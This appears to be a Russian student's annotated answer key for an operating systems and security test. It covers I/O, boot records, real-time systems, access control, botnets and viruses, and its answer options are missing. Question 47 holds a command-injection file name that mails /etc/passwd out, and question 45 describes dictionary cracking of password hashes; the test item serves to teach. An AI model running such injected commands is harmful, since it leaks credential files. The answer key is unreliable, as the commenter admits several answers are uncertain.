ЗАДАНИЕ N 33 ( - выберите один вариант ответа) Каждый элемент таблицы оборудования условно называется … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту): Исходя из принципа управления вводом-выводом исключительно через супервизор операционной системы и учитывая, что драйверы устройств ввода-вывода используют механизм прерываний для установления обратной связи центральной части с внешними устройствами, можно сделать вывод о необходимости создания по крайней мере трех системных таблиц. Первая таблица (или список) содержит информацию обо всех устройствах ввода-вывода, подключенных к вычислительной системе. Назовем ее условно таблицей оборудования (equipment table), а каждый элемент этой таблицы пусть называется UCB (Unit Control Block — блок управления устройством ввода-вывода). Каждый элемент UCB таблицы оборудования, как правило, содержит следующую информацию об устройстве:
|
||||||||||
ЗАДАНИЕ N 34 ( - выберите один вариант ответа) Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту): Задача, выдавшая запрос на операцию ввода-вывода, переводится супервизором в состояние ожидания завершения заказанной операции. Когда супервизор получает от секции завершения сообщение о том, что операция завершилась, он переводит задачу в состояние готовности к выполнению, и она продолжает выполняться. Эта ситуация соответствует синхронному вводу-выводу. Синхронный ввод-вывод является стандартным для большинства операционных систем. Чтобы увеличить скорость выполнения приложений, было предложено при необходимости использовать асинхронный ввод-вывод. Простейшим вариантом асинхронного вывода является так называемый буферизованный вывод данных на внешнее устройство, при котором данные из приложения передаются не непосредственно на устройство ввода-вывода, а в специальный системный буфер — область памяти, отведенную для временного размещения передаваемых данных. В этом случае логически операция вывода для приложения считается выполненной сразу же, и задача может не ожидать окончания действительного процесса передачи данных на устройство. Реальным выводом данных из системного буфера занимается супервизор ввода-вывода. Естественно, что выделение буфера из системной области памяти берет на себя специальный системный процесс по указанию супервизора ввода-вывода. Итак, для рассмотренного случая вывод будет асинхронным, если, во-первых, в запросе на ввод-вывод указано на необходимость буферизации данных, а во-вторых, устройство ввода-вывода допускает такие асинхронные операции, и это отмечено в UCB.
|
ЗАДАНИЕ N 35 ( - выберите один вариант ответа) Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту): Разделение всего дискового пространства на разделы полезно по нескольким соображениям. Во-первых, это структурирует хранение данных. Например, выделение отдельного раздела под операционную систему и программное обеспечение и другого раздела под данные пользователей позволяет отделить последние от системных файлов и не только повысить надежность системы, но и сделать более удобным ее обслуживание. Во-вторых, на каждом разделе может быть организована своя файловая система, что иногда бывает необходимо. Например, при установке операционной системы Linux нужно иметь не менее двух разделов, поскольку файл подкачки (страничный файл) должен располагаться в отдельном разделе. Наконец, в ряде случаев на компьютере может потребоваться установка более одной операционной системы. Для того чтобы системное программное обеспечение получило информацию о том, как организовано хранение данных на каждом конкретном накопителе, нужно разместить в одном из секторов соответствующие данные. Даже если НЖМД используется как единственный логический диск, все равно нужно указать, что имеется всего один диск, и его размер. Структура данных, несущая информацию о логической организации диска, вместе с небольшой программой, с помощью которой можно ее проанализировать, а также найти и загрузить в оперативную память программу загрузки операционной системы, получила название главной загрузочной записи (Master Boot Record, MBR). MBR располагается в самом первом секторе НЖМД, то есть в секторе с координатами 0-0-1. Программа, расположенная в MBR, носит название внесистемного загрузчика (Non-System Bootstrap, NSB).
|
||||||||||
ЗАДАНИЕ N 36 ( - выберите один вариант ответа) Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту): Как известно, накопители на магнитных дисках обладают крайне низким быстродействием по сравнению с процессорами и оперативной памятью. Разница составляет несколько порядков. Например, современные процессоры за один такт работы, а они работают уже с частотами в несколько гигагерц, могут выполнять по две операции, и, таким образом, время выполнения операции (с позиции внешнего наблюдателя, который не видит конвейеризации при выполнении машинных команд, позволяющей увеличить производительность в несколько раз) может составлять менее 0,5 не (!). В то же время переход магнитной головки с дорожки на дорожку занимает несколько миллисекунд; подобная же задержка требуется и на поиск нужного сектора данных. Как известно, в современных приводах средняя длительность на чтение случайным образом выбранного сектора данных составляет около 20 мс, что существенно медленнее, чем выборка команды или операнда из оперативной памяти и уж тем более из кэш-памяти. Правда, после этого данные читаются большим пакетом (сектор, как мы уже говорили, имеет размер 512 байт, а при операциях с диском часто читаются или записываются сразу несколько секторов). Таким образом, средняя скорость работы процессора с оперативной памятью на 2-3 порядка выше, чем средняя скорость передачи данных из внешней памяти на магнитных дисках в оперативную память. Для того чтобы сгладить такое сильное несоответствие в производительности основных подсистем, используется буферизация и/или кэширование данных в дисковом кэше (disk cache). Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной буферизации. Ее суть заключается в том, что пока в один буфер заносятся данные с магнитного диска, из второго буфера ранее считанные данные могут быть прочитаны и переданы в запросившую их задачу. Аналогично и при записи данных. Буферизация используется во всех операционных системах, но помимо буферизации применяется и кэширование. Кэширование исключительно полезно в том случае, когда программа неоднократно читает с диска одни и те же данные. После того как они один раз будут помещены в кэш, обращений к диску больше не потребуется, и скорость работы программы значительно возрастет.
|
ЗАДАНИЕ N 37 ( - выберите один вариант ответа) Операционная система реального времени должна обеспечивать … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из книги И.Б. Бурдонов, А.С. Косачев,В.Н. Пономаренко Операционные системы реального времени http://citforum.ru/operating_systems/rtos/1.shtml): Операционные системы реального времени (ОСРВ) предназначены для обеспечения интерфейса к ресурсам критических по времени систем реального времени. Основной задачей в таких системах является своевременность (timeliness) выполнения обработки данных. В качестве основного требования к ОСРВ выдвигается требование обеспечения предсказуемости или детерминированности поведения системы в наихудших внешних условиях, что резко отличается от требований к производительности и быстродействию универсальных ОС. Хорошая ОСРВ имеет предсказуемое поведение при всех сценариях системной загрузки (одновременные прерывания и выполнение потоков). Принято различать системы мягкого (soft) и жесткого (hard) реального времени. В системах жесткого реального времени неспособность обеспечить реакцию на какие-либо события в заданное время ведет к отказам и невозможности выполнения поставленной задачи. Системы мягкого реального времени могут не успевать решать задачу, но это не приводит к отказу системы в целом. В системах реального времени необходимо введение некоторого директивного срока (в англоязычной литературе – deadline), до истечения которого задача должна обязательно (для систем мягкого реального времени – желательно) выполниться. -----примеры из вики: Системы жёсткого реального времени не допускают задержек реакции системы, так как это может привести к:
Большинство программного обеспечения ориентировано на «мягкое» реальное время. Для подобных систем характерно:
Классическим примером задачи, где требуется ОСРВ, является управление роботом, берущим деталь с ленты конвейера. Деталь движется, и робот имеет лишь маленький промежуток времени, когда он может её взять. Если он опоздает, то деталь уже не будет на нужном участке конвейера, и следовательно, работа не будет выполнена, несмотря на то, что робот находится в правильном месте. Если он подготовится раньше, то деталь ещё не успеет подъехать, и он заблокирует ей путь. ---- Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ [DEDSYS]:
|
||||||||||
ЗАДАНИЕ N 38 ( - выберите один вариант ответа) К невыгружаемым относятся такие ресурсы, которые не могут быть … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 3 Комментарий (ответ http://www.moodle.ipm.kstu.ru/mod/page/view.php?id=56): Взаимоблокировка процессов может происходить, когда несколько процессов борются за один ресурс. Ресурсы бывают выгружаемые и невыгружаемые, аппаратные и программные. Выгружаемый ресурс - этот ресурс безболезненно можно забрать у процесса (например: память). Невыгружаемый ресурс - этот ресурс нельзя забрать у процесса без потери данных (например: принтер). Проблема взаимоблокировок процессов возникает при борьбе за невыгружаемый ресурсы.
|
ЗАДАНИЕ N 39 ( - выберите один вариант ответа) Интерфейс прикладного программирования предназначен для использования прикладными программами … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1 Комментарий (ответ из книги Гордеева-питер,2007г.-стр.298): Необходимо однозначно разделить общий термин API (Application Program Interface — интерфейс прикладного программирования) на следующие направления: • API как интерфейс высокого уровня, принадлежащий к библиотекам RTL (Run Time Library - библиотека времени выполнения); • API прикладных и системных программ, входящих в поставку операционной системы; • прочие интерфейсы API. Интерфейс прикладного программирования, как это и следует из названия, предназначен для использования прикладными программами системных ресурсов компьютера и реализуемых операционной системой разнообразных системных функций. API описывает совокупность функций и процедур, принадлежащих ядру или надстройкам операционной системы. Итак, API — это набор функций, предоставляемых системой программирования разработчику прикладной программы и ориентированных на организацию взаимодействия результирующей прикладной программы с целевой вычислительной системой. Целевая вычислительная система представляет собой совокупность программных и аппаратных средств, в окружении которых выполняется результирующая программа. Сама результирующая программа порождается системой программирования на основании кода исходной программы, созданного разработчиком, а также объектных модулей и библиотек, входящих в состав системы программирования.
|
||||||||||
ЗАДАНИЕ N 40 ( - выберите несколько вариантов ответа) По режиму обработки задач различают операционные системы, обеспечивающие _________ режим |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1,3 Комментарий (ответ из http://sga-informatika.ru/153303/136-211-operating-systems.html): По режиму обработки задач различают ОС, обеспечивающие однопрограммный и мультипрограммный режимы. Под мультипрограммированием понимается способ организации вычислений, когда на однопроцессорной вычислительной системе создается видимость одновременного выполнения нескольких программ. Любая задержка в решении программы (например, для осуществления операций ввода/вывода данных) используется для выполнения других (таких же, либо менее важных) программ.
|
ЗАДАНИЕ N 41 ( - выберите один вариант ответа) Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц. |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
p.s.: не совсем корректный вопрос и варианты ответа. ОТВЕТ: 3 Комментарий (ответ из http://maloir.ucoz.ru/publ/kto_takie_internet_zombi_chast_1/1-1-0-14): Кто такие интернет – зомби. Ботнеты существуют уже около 10 лет, и приблизительно столько же эксперты предупреждают о той опасности, которую они представляют. Тем не менее, проблема ботнетов по-прежнему остается недооцененной, и многие пользователи (до тех пор пока им не отключат Интернет, пока они не обнаружат исчезновение денег с кредитных карт или у них не украдут почтовый ящик или аккаунт IM - Instant messaging - сервис, предназначенный для обмена сообщениями в режиме реального времени) плохо понимают, в чем состоит реальная угроза зомби-сетей. Ботнет — это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя. Такие программы называются ботами. Ботнеты обладают мощными вычислительными ресурсами, являются грозным кибероружием и хорошим способом зарабатывания денег для злоумышленников. При этом зараженными машинами, входящими в сеть, хозяин ботнета может управлять откуда угодно: из другого города, страны или даже с другого континента, а организация Интернета позволяет делать это анонимно. Управление компьютером, который заражен ботом, может быть прямым и опосредованным. В случае прямого управления злоумышленник может установить связь с инфицированным компьютером и управлять им, используя встроенные в тело программы-бота команды. В случае опосредованного управления бот сам соединяется с центром управления или другими машинами в сети, посылает запрос и выполняет полученную команду. В любом случае хозяин зараженной машины, как правило, даже не подозревает о том, что она используется злоумышленниками. Именно поэтому зараженные вредоносной программой-ботом компьютеры, находящиеся под тайным контролем киберпреступников, называют еще зомби-компьютерами, а сеть, в которую они входят, – зомби-сетью. Чаще всего зомби-машинами становятся персональные компьютеры домашних пользователей. Более подробную информацию по данному вопросу можно почитать тут: http://maloir.ucoz.ru/publ/kto_takie_internet_zombi_chast_1/1-1-0-14
|
||||||||||
ЗАДАНИЕ N 42 ( - выберите один вариант ответа) Недостаток систем шифрования с секретным ключом состоит в том, что … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 2 Комментарий (ответ из http://www.intuit.ru/department/security/netsec/12/netsec_12.html): Существует два основных типа шифрования:
При шифровании с секретным ключом требуется, чтобы все стороны, имеющие право на прочтение информации, имели один и тот же ключ. Это позволяет свести общую проблему безопасности информации к проблеме обеспечения защиты ключа. Шифрование с открытым ключом является наиболее широко используемым методом шифрования. Он обеспечивает конфиденциальность информации и гарантию того, что информация остается неизменной в процессе передачи.
http://sevidi.ru/phpstroy/stroypage72.php : Шифрование с закрытым ключом основано на том, что доступ к ключу имеет только авторизованный персонал. Этот ключ должен держаться в секрете. Если ключ попадет в нехорошие руки, посторонний сможет получить несанкционированный доступ к зашифрованной информации. Явный недостаток алгоритмов с закрытым ключом состоит в том, что для отправки кому-то защищенного сообщения необходимо располагать безопасным способом передачи этому лицу закрытого ключа. А если у вас есть безопасный метод передачи ключа, то почему не воспользоваться этим же методом для передачи сообщений? К счастью, в 1976 году произошел прорыв, когда Дифи и Хелман опубликовали первый алгоритм шифрования с открытым ключом. Шифрование с открытым ключом базируется на двух различных ключах — открытом и закрытом. Как показано на рисунке, открытый ключ используется для шифрования сообщений, а закрытый — для их дешифрации. Любой человек, которому вы передали свой открытый ключ, может отправить вам защищенное сообщение. Но поскольку закрытым ключом обладаете только вы, только вы и сможете дешифровать сообщение. Наиболее известный алгоритм с открытым ключом — это алгоритм RSA. Огромным преимуществом алгоритмов с открытым ключом является возможность передачи открытого ключа по незащищенному каналу, не беспокоясь. что он будет прочитан третьей стороной. Несмотря на это, системы с закрытым ключом все еще используются повсеместно. Часто можно встретить гибридные системы. В таких системах алгоритм с открытым ключом применяется для передачи закрытого ключа, который используется для обмена данными до конца связи. Эта дополнительная сложность компенсируется тем, что алгоритмы с закрытым ключом работают на три порядка быстрее алгоритмов с открытым ключом.
Скорее всего данный вопрос формулировался строго по Таненбауму. Современные операционные системы. Питер-2002г,Стр. 647:
|
ЗАДАНИЕ N 43 ( - выберите один вариант ответа) Объектами защиты в компьютерных системах могут быть … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ:1, 2 или 3 Комментарий: однозначного ответа нет, т.к. куча источников, которые пишут разные вещи, а рекомендуемой литературы нет. Посмотрите по этому вопросу еще инф-ю.
Информация из 4-х разных источников, изучив их сложно сказать какой из ответов верный:
* терминалы пользователей (персональные компьютеры, рабочие станции сети); * терминал администратора сети или групповой абонентский узел; * узел связи; * средства отображения информации; * средства документирования информации; * машинный зал (компьютерный или дисплейный) и хранилище носителей информации; * внешние каналы связи и сетевое оборудование; * накопители и носители информации.
Несанкционированная модификация информации о безопасности системы может привести к несанкционированным действиям (неверной маршрутизации или утрате передаваемых данных) или искажению смысла передаваемых сообщений. Целостность аппаратуры нарушается при ее повреждении, похищении или незаконном изменении алгоритмов работы. Угрозы доступности данных. Возникают в том случае, когда объект (пользователь или процесс) не получает доступа к законно выделенным ему службам или ресурсам. Эта угроза реализуется захватом всех ресурсов, блокированием линий связи несанкционированным объектом в результате передачи по ним своей информации или исключением необходимой системной информации.
Объектом защиты информации является компьютерная система или автоматизированная система обработки данных (АСОД). При решении проблемы защиты информации в КС необходимо учитывать также противоречивость человеческого фактора системы. Обслуживающий персонал и пользователи могут быть как объектом, так и источником несанкционированного воздействия на информацию. Понятие «объект защиты» или «объект» чаще трактуется в более широком смысле. Для сосредоточенных КС или элементов распределенных систем понятие «объект» включает в себя не только информационные ресурсы, аппаратные, программные средства, обслуживающий персонал, пользователей, но и помещения, здания, и даже прилегающую к зданиям территорию.
http://library.tuit.uz/skanir_knigi/book/iformacionnaya_bezopasnost/glav_7_8_9.htm#glav_7 : Под объектами защиты КС обычно понимается такой структурный компонент компьютерной системы, в котором находится или может находиться подлежащая защите конфиденциальная информация. Объект, на котором производятся работы с конфиденциальной информацией, имеет, как правило, несколько рубежей или контуров защиты. В их числе можно выделить контролируемую территорию, здания, помещения, устройства КС, носители информации и т.д.
|
||||||||||
ЗАДАНИЕ N 44 ( - выберите один вариант ответа) Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на ... |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
p.s.: тоже странный вопрос, видимо его надо трактовать так: только руководитель конкретного подразделения понимает кому и что видеть, делать и пр, а он уже потом в свою очередь все расскажет админу. ОТВЕТ: 4 Комментарий(ответ из http://proweb.info/informatsionnaja_bezopasnost/kriterii_opredelenija_bezopasnosti_komputernih_sistem/): Принудительное управление доступом основано на сопоставлении меток безопасности субъекта и объекта. Субъект может читать информацию из объекта, если уровень секретности субъекта не ниже, чем у объекта, а все категории, перечисленные в метке безопасности объекта, присутствуют в метке субъекта. В таком случае говорят, что метка субъекта доминирует над меткой объекта. Субъект может записывать информацию в объект, если метка безопасности объекта доминирует над меткой субъекта. В частности, «конфиденциальный» субъект может писать в секретные файлы, но не может — в несекретные (разумеется, должны также выполняться ограничения на набор категорий). На первый взгляд подобное ограничение может показаться странным, однако оно вполне разумно. Ни при каких операциях уровень секретности информации не должен понижаться, хотя обратный процесс вполне возможен. Разделы и классы Критерии делятся на 4 раздела: D, C, B и A, из которых наивысшей безопасностью обладает раздел A. Каждый дивизион представляет собой значительные отличия в доверии индивидуальным пользователям или организациям. Разделы C, B и A иерархически разбиты на серии подразделов, называющиеся классами: C1, C2, B1, B2, B3 и A1. Каждый раздел и класс расширяет или дополняет требования указанные в предшествующем разделе или классе.
D — Минимальная защита Системы, безопасность которых была оценена, но оказалась не удовлетворяющей требованиям более высоких разделов.
C — Дискреционная защита
B — Мандатная защита
A — Проверенная защита
Классы безопасности
По мере перехода от уровня C к A к системам предъявляются все более жесткие требования. Уровни C и B подразделяются на классы (C1, C2, B1, B2, B3) с постепенным возрастанием степени доверия.
(Подробное описание классов представлено http://proweb.info/informatsionnaja_bezopasnost/kriterii_opredelenija_bezopasnosti_komputernih_sistem/) |
ЗАДАНИЕ N 45 ( - выберите один вариант ответа) Защита зашифрованных паролей в UNIX взламывается путем … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 1,3 Комментарий (ответ http://www.supermegayo.ru/antihack/30.html): На любом UNIXe (если не используется система специальной защиты) файл с паролями находится в директории etc, в файле passwd. Файл зашифрован необратимо и программы для его обратного декодирования просто не существует, но есть другая возможность: кодировать слова (возможные пароли) и сравнивать получившийся кодированный вариант со всеми зашифрованными паролями в файле passwd. Хакеры создали программы, делающие это автоматически, но для полноценной работы вам понадобится довольно быстрый компьютер и хороший словарь с возможными паролями.
|
||||||||||
ЗАДАНИЕ N 46 ( - выберите один вариант ответа) Лазейки в программах создаются … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 4 (может и 1?) p.s.: вообще однозначно утверждать, что 4-й ответ верный сложно, т.к. может и программист быть не чист на руку и поэтому ответ 1 в итоге может оказаться правильным. Комментарий (ответ из http://zarodinu.org.ua/page/410):
Как и в отношении любого другого процесса, условия безошибочной работы программы не могут быть определены, просто потому, что изначально невозможно выявить и учесть все параметры, влияющие на работу системы. Следовательно, невозможно и выявить все возможные ошибки. Для выявления и перехвата неизвестных ошибок с их последующей корректной обработкой, получения управления над системой и т.п. разработчики часто используют специально созданные программные ошибки - лазейки . Лазейка - скрытый программный или аппаратный механизм, позволяющий обойти системные механизмы защиты. Обычно этот механизм активизируется некоторым не очевидным способом. Лазейки не видны "конечным пользователям". Они создаются программистами для собственных нужд, большинство даже не догадывается об их существовании.
|
ЗАДАНИЕ N 47 ( - выберите один вариант ответа) Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система? |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 4 Комментарий:
# mail mail@zabrosov.ru Subject: Servers:We are working! "All servers is work, well." . EOT # Другой вариант: # echo "This is the mail body" | mail mail@zabrosov.ru
< файл Использовать файл как источник данных для стандартного потока ввода. > файл Направить стандартный поток вывода в файл. Если файл не существует, он будет создан; если существует — перезаписан сверху.
|
||||||||||
ЗАДАНИЕ N 48 ( - выберите один вариант ответа) Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 3 КОММЕНТАРИЙ (из файла И.В.): Рассылка спама. Это наиболее распространенный и один из самых простых вариантов эксплуатации ботнетов. По экспертным оценкам, в настоящее время более 80% спамовых писем рассылается с зомби-машин. Спам с ботнетов не обязательно рассылается владельцами сети. За определенную плату спамеры могут взять ботнет в аренду. По нашим данным, среднестатистический спамер зарабатывает 50-100 тысяч долларов в год. Многотысячные ботнеты позволяют спамерам осуществлять с зараженных машин миллионные рассылки в течение короткого времени.
|
ЗАДАНИЕ N 49 ( - выберите один вариант ответа) Перезаписывающий вирус заражает исполняемую программу путем … |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
||||||||||
ОТВЕТ: 4 КОММЕНТАРИЙ (ответ из http://www.softplace.uz/security-menu/12-security-review/145-how-to-remove-virus-and-adware): Перезаписывающие вирусы Вирусы данного типа записывают свое тело вместо кода программы, не изменяя названия исполняемого файла, вследствие чего исходная программа перестает запускаться. При запуске программы выполняется код вируса, а не сама программа.
|
||||||||||
ЗАДАНИЕ N 50 ( - выберите один вариант ответа) Обнаружить зашифрованный вирус можно ... |
||||||||||
ВАРИАНТЫ ОТВЕТОВ:
|
ОТВЕТ: 3
КОММЕНТАРИЙ (ответ из ФАЙЛА И.В. http://computerf1.at.ua/publ/kompjuternye_virusy/chto_takoe_kompjuternye_virusy_i_kak_oni_rabotajut_4_chast/11-1-0-136):
Шифрованные вирусы Шифрованные вирусы (Encrypted viruses) - вирусы, которые сами шифруют свой код для затруднения их дезассемблирования и обнаружения в файле, памяти или секторе.